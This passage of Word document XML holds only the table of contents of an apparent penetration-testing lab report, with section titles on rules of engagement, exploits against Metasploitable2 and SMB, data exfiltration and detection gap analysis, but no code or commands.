            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1. Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127132 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75299C43" w14:textId="1F374167"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3" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Rules of Engagement (RoE)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127133 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="585C9A71" w14:textId="6DF5044F"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4" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Lab Environment Design</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127134 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="739DD4AA" w14:textId="5692A594"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35" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Threat Emulation Plan</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127135 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08F46204" w14:textId="05F834A7"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36" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127136 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2260E86E" w14:textId="49C4D8D7"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37" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 Attack Lifecycle and Methodology</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127137 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AC1878B" w14:textId="124F9843"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38" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3 MITRE ATT&amp;CK Mapping</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127138 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D79D98D" w14:textId="5E83A0FA"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39" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4 Objectives and Success Criteria</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127139 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="769BF260" w14:textId="36A9165C"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0" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5 Justification of Approach</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127140 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57AE4C54" w14:textId="125254E0"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41" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. Attack Execution and Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127141 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54B30B4E" w14:textId="32E6C066"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2" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Exploit 1 — Web Server Compromise (Metasploitable2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127142 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73C5928A" w14:textId="329FD10A"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3" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Exploit 2 — Windows System Access via SMB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127143 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D93A4DA" w14:textId="3ADDB271"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4" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Exploit 3 — Data Exfiltration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127144 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24282E9E" w14:textId="12E6699B"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45" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>6. Detection Gap Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127145 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34911AC5" w14:textId="19151531"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6" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1 Reconnaissance Phase</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127146 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DBCDA53" w14:textId="571E7C54"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7" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2 Initial Access and Exploitation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127147 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11106511" w14:textId="2684BFF5"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8" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3 Execution and System Compromise</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127148 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D01F885" w14:textId="1405A299"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49" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.4 Internal Access and Credential Abuse</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127149 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FA7DAC4" w14:textId="00657AB2" w:rsidR="006A15E7" w:rsidRDefault="006A15E7">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9630"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc228127150" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.5 Data Exfiltration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127150 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35803984" w14:textId="0E5C836A"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51" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7. Tools and Techniques Used</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127151 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="132B4C28" w14:textId="03ECC723"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52" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8. Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127152 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F154DC7" w14:textId="75196C56"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53" w:history="1">
            <w:r w:rsidRPr="0014514F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc228127153 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F55D4C9" w14:textId="11E10D15"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54" w:history="1">
